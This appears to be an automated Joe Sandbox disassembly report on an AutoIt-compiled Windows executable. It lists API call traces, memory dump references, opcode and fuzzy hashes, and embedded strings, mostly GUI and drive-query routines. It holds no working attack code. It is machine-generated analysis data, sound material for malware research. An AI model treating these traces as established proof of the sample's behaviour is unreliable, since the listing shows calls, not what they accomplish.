Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 5c3d42cac53ec1ee2a2fbc74fc8ee2e732ecb6b2f338daff6200943d88a617dd
• Instruction ID: 866b1dff54cfc96755c4972d7a702aa0b34ea894449f5835f499f84e8cbccb31
• Opcode Fuzzy Hash: 5c3d42cac53ec1ee2a2fbc74fc8ee2e732ecb6b2f338daff6200943d88a617dd
• Instruction Fuzzy Hash: ABD09E3226450EBBEF019EA4ED05EAE3B69EB04B01F408511FE15D51A1C7B5D935AB60
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0090A12A
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 747fe8d81565a9e16da39036e28610ed26489d95d31dd52bb86a25669d2c7a52
• Instruction ID: 443b745977ce589285fe2dde157bb0f70ff6a7907db03605941bf080961c676f
• Opcode Fuzzy Hash: 747fe8d81565a9e16da39036e28610ed26489d95d31dd52bb86a25669d2c7a52
• Instruction Fuzzy Hash: 83A0123001410CA78A001B41FC048447F5CD6002D07004020F40C40121977254105580
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e250a7594d6620819e2f46773d35a01c6fc9260a172b82ad93673478f683d543
• Instruction ID: 9dd0b4e33ad9d7e2ebfdb01ab685e382cb1216aae597622f4aacee152b06a487
• Opcode Fuzzy Hash: e250a7594d6620819e2f46773d35a01c6fc9260a172b82ad93673478f683d543
• Instruction Fuzzy Hash: EE22433060852ECBDF388B78C4D427DBBA1FB05344F2A846BDA56CB592DB749D91CB42
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: 4ac62f98b17368c1b9db474500682c1f9e863edf87e3b2d9144e7fff4c630751
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 48C186332091930EDF2D4739847813EFBA55EA27B135A076EE8B3CB1D4EE24D965D620
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: e5f84b6301b47076cd8452612658be52729124bb06fe5d46b7168bcf707b21cb
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: 38C186372051930DDF6D4739C43813EFAA55FA27B135A076ED4B2DB1D4EE20D925E620
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction ID: d8e8f16af672836e2a96419a19e3af58667e1fc69bc4490cd242ae0f536056ee
• Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
• Instruction Fuzzy Hash: 4BC195332091930EDF6D463AC47413EFBA55EA27B135A076ED8B3DB1D4EE20C965E620
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: d12b3c616820001b9b953144b5927523c43d416d5daa59dcccd5da8cef777bfb
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: 15C181332091A30EDF2D463AC47413EFBA95EA27B135A176ED4B3DB1D4EE20C965D620
APIs
• DeleteObject.GDI32(00000000), ref: 0095785B
• DeleteObject.GDI32(00000000), ref: 0095786D
• DestroyWindow.USER32 ref: 0095787B
• GetDesktopWindow.USER32 ref: 00957895
• GetWindowRect.USER32(00000000), ref: 0095789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009579DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009579ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957A35
• GetClientRect.USER32(00000000,?), ref: 00957A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00957A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957ABB
• GlobalLock.KERNEL32(00000000), ref: 00957AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00957ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957AE3
• GlobalFree.KERNEL32(00000000), ref: 00957AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00972CAC,00000000), ref: 00957B16
• GlobalFree.KERNEL32(00000000), ref: 00957B26
                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00957B4C
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00957B6B
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957B8D
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00957D7A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: 85ae31a1512ea81ef119b79ec7e349fcf30fbbf179eb6c77b011f8b902886c64
                                                                                                                • Instruction ID: a748702a930d333c2ae096560a03eba3284b1be1246bd0d38b65cb67968b1d6a
                                                                                                                • Opcode Fuzzy Hash: 85ae31a1512ea81ef119b79ec7e349fcf30fbbf179eb6c77b011f8b902886c64
                                                                                                                • Instruction Fuzzy Hash: 86028B71914115AFDB14DFA9EC99EAEBBB9FF49310F008168F915AB2A0C7B09D01DB60
APIs
• CharUpperBuffW.USER32(?,?,0096F910), ref: 00963627
• IsWindowVisible.USER32(?), ref: 0096364B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
• Opcode ID: 3d1f7b381a354e47d45c80e00150bad5ddc043d31c8cac5ace681c6e40f86173
• Instruction ID: eb3db28a1ebccad31268692b33aba31d81c9f31f68f92dec624921106d9a3d43
• Opcode Fuzzy Hash: 3d1f7b381a354e47d45c80e00150bad5ddc043d31c8cac5ace681c6e40f86173
• Instruction Fuzzy Hash: 91D17E702043419FCB14EF54C456B6E7BE5AF95354F148868F8869B3E2DB61DE0ACB42
APIs
• SetTextColor.GDI32(?,00000000), ref: 0096A630
• GetSysColorBrush.USER32(0000000F), ref: 0096A661
• GetSysColor.USER32(0000000F), ref: 0096A66D
• SetBkColor.GDI32(?,000000FF), ref: 0096A687
• SelectObject.GDI32(?,00000000), ref: 0096A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 0096A6C1
• GetSysColor.USER32(00000010), ref: 0096A6C9
• CreateSolidBrush.GDI32(00000000), ref: 0096A6D0
• FrameRect.USER32(?,?,00000000), ref: 0096A6DF
• DeleteObject.GDI32(00000000), ref: 0096A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 0096A731
• FillRect.USER32(?,?,00000000), ref: 0096A763
• GetWindowLongW.USER32(?,000000F0), ref: 0096A78E
  • Part of subcall function 0096A8CA: GetSysColor.USER32(00000012), ref: 0096A903
  • Part of subcall function 0096A8CA: SetTextColor.GDI32(?,?), ref: 0096A907
  • Part of subcall function 0096A8CA: GetSysColorBrush.USER32(0000000F), ref: 0096A91D
  • Part of subcall function 0096A8CA: GetSysColor.USER32(0000000F), ref: 0096A928
  • Part of subcall function 0096A8CA: GetSysColor.USER32(00000011), ref: 0096A945
  • Part of subcall function 0096A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0096A953
  • Part of subcall function 0096A8CA: SelectObject.GDI32(?,00000000), ref: 0096A964
  • Part of subcall function 0096A8CA: SetBkColor.GDI32(?,00000000), ref: 0096A96D
  • Part of subcall function 0096A8CA: SelectObject.GDI32(?,?), ref: 0096A97A
  • Part of subcall function 0096A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0096A999
  • Part of subcall function 0096A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0096A9B0
  • Part of subcall function 0096A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0096A9C5
  • Part of subcall function 0096A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0096A9ED
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: 308c2063436d805461e1b766424befc730c579d005fb94d3daaa20dd55a87f86
• Instruction ID: 04b6a63b3daa04dd09b64f0e5351eee176953cbe7b6ea3e253b2046968dab33a
• Opcode Fuzzy Hash: 308c2063436d805461e1b766424befc730c579d005fb94d3daaa20dd55a87f86
• Instruction Fuzzy Hash: 97917F7241C301EFCB109F64EC08A6B7BA9FF89321F104A2DF562A61A1D7B5D944EF52
APIs
• DestroyWindow.USER32(00000000), ref: 009574DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0095759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009575DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009575ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00957633
• GetClientRect.USER32(00000000,?), ref: 0095763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00957683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00957692
• GetStockObject.GDI32(00000011), ref: 009576A2
• SelectObject.GDI32(00000000,00000000), ref: 009576A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009576B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 009576BF
• DeleteDC.GDI32(00000000), ref: 009576C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009576F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0095770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00957746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0095775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0095776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0095779B
• GetStockObject.GDI32(00000011), ref: 009577A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009577B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009577BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 157059e5b073b38b5c9b946df6f9542a0d231a07574390ad45e469fe1cc372fa
• Instruction ID: 16da7af806a1f8b9f0b3f27beabfab180fd2957ee40b6363a1b36c952ae8b651
• Opcode Fuzzy Hash: 157059e5b073b38b5c9b946df6f9542a0d231a07574390ad45e469fe1cc372fa
• Instruction Fuzzy Hash: 36A19271A14615BFEB10DBA9EC4AFAE7B69EF05710F004118FA15E72E0D7B0AD01DBA0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0094AD1E
• GetDriveTypeW.KERNEL32(?,0096FAC0,?,\\.\,0096F910), ref: 0094ADFB
• SetErrorMode.KERNEL32(00000000,0096FAC0,?,\\.\,0096F910), ref: 0094AF59
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: b41eb59a8bac97849f4fc948e0140ce7d5b712e3cca081d24709850db22f2336
• Instruction ID: f794c4dbd05b8863a7bfd79695fd889a4ec28ae5abb91d37c4232479cbf3cec3
• Opcode Fuzzy Hash: b41eb59a8bac97849f4fc948e0140ce7d5b712e3cca081d24709850db22f2336
• Instruction Fuzzy Hash: 5151F6F1688205EB8F10DB19C952CBE73A4FB8A318B6444AAF407E72D1CB769D05DB43
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: 408427c5ec920fc5ad7d4c6ca39ccf4091b1f7e098351295a39b6c868174a040
• Instruction ID: 57f7e3438aa5012eb94d8e0da322d9a8b3a0f1776a8190a558fda36c2aef09af
• Opcode Fuzzy Hash: 408427c5ec920fc5ad7d4c6ca39ccf4091b1f7e098351295a39b6c868174a040
• Instruction Fuzzy Hash: C681F5B17002596ACB20AB35EC53FAA3B68FF66744F044025FD05EA1D6FB60DE61C251
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00969AD2
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00969B8B
• SendMessageW.USER32(?,00001102,00000002,?), ref: 00969BA7
Strings
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
• Opcode ID: 55b5bed3b4488bb97fade1a45ad5bc997b540ba14707f1b33bffa3be12573cec
• Instruction ID: 9a940a5778bd6debdc4f139fd9e41b3bfab178153920c99b415022276a8df1f2
• Opcode Fuzzy Hash: 55b5bed3b4488bb97fade1a45ad5bc997b540ba14707f1b33bffa3be12573cec
• Instruction Fuzzy Hash: A702CE30208201AFDB25CF24C858BAABBEDFF4A714F04892DF999D62A1C775DD44DB52
APIs
• GetSysColor.USER32(00000012), ref: 0096A903
• SetTextColor.GDI32(?,?), ref: 0096A907
• GetSysColorBrush.USER32(0000000F), ref: 0096A91D
• GetSysColor.USER32(0000000F), ref: 0096A928
• CreateSolidBrush.GDI32(?), ref: 0096A92D
• GetSysColor.USER32(00000011), ref: 0096A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0096A953
• SelectObject.GDI32(?,00000000), ref: 0096A964
• SetBkColor.GDI32(?,00000000), ref: 0096A96D
• SelectObject.GDI32(?,?), ref: 0096A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 0096A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0096A9B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 0096A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0096A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0096AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 0096AA32
• DrawFocusRect.USER32(?,?), ref: 0096AA3D
• GetSysColor.USER32(00000011), ref: 0096AA4B
• SetTextColor.GDI32(?,00000000), ref: 0096AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0096AA67
• SelectObject.GDI32(?,0096A5FA), ref: 0096AA7E
• DeleteObject.GDI32(?), ref: 0096AA89
• SelectObject.GDI32(?,?), ref: 0096AA8F
• DeleteObject.GDI32(?), ref: 0096AA94
• SetTextColor.GDI32(?,?), ref: 0096AA9A
• SetBkColor.GDI32(?,?), ref: 0096AAA4
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 3cc4e3812234470d693da2690c1cd81ab8b463fd7c5cee7b9f14564552e59764
• Instruction ID: fa1d475f196973c7b894f33868cb8932046ab80d2a8ddd79797feea6fdc6a44f
• Opcode Fuzzy Hash: 3cc4e3812234470d693da2690c1cd81ab8b463fd7c5cee7b9f14564552e59764
• Instruction Fuzzy Hash: CD513D71914208EFDF109FA4EC48EAE7B79EF49320F214529F911AB2A1D7B59940EF90
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00968AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00968AD2
• CharNextW.USER32(0000014E), ref: 00968B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00968B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00968B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00968B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00968B86
• SetWindowTextW.USER32(?,0000014E), ref: 00968BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00968BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00968C1F
• _memset.LIBCMT ref: 00968C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00968C8D
• _memset.LIBCMT ref: 00968CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00968D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00968D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00968E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00968E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00968E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00968EB4
• DrawMenuBar.USER32(?), ref: 00968EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00968EEB
Strings
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: 430a4092680ce4f329c0ba113d3d354a0384c91a2f1334b3d383d29a27d2f969
• Instruction ID: 6411ee66714efff05d1de5d3561e32dff1377143c8b7e1521fb1e92a98d14c17
• Opcode Fuzzy Hash: 430a4092680ce4f329c0ba113d3d354a0384c91a2f1334b3d383d29a27d2f969
• Instruction Fuzzy Hash: 69E16070914218AFDF209FA4CC84EEF7BBDEF49754F10825AF915AA290DB748981DF60
APIs
• GetCursorPos.USER32(?), ref: 009649CA
• GetDesktopWindow.USER32 ref: 009649DF
• GetWindowRect.USER32(00000000), ref: 009649E6
• GetWindowLongW.USER32(?,000000F0), ref: 00964A48
• DestroyWindow.USER32(?), ref: 00964A74
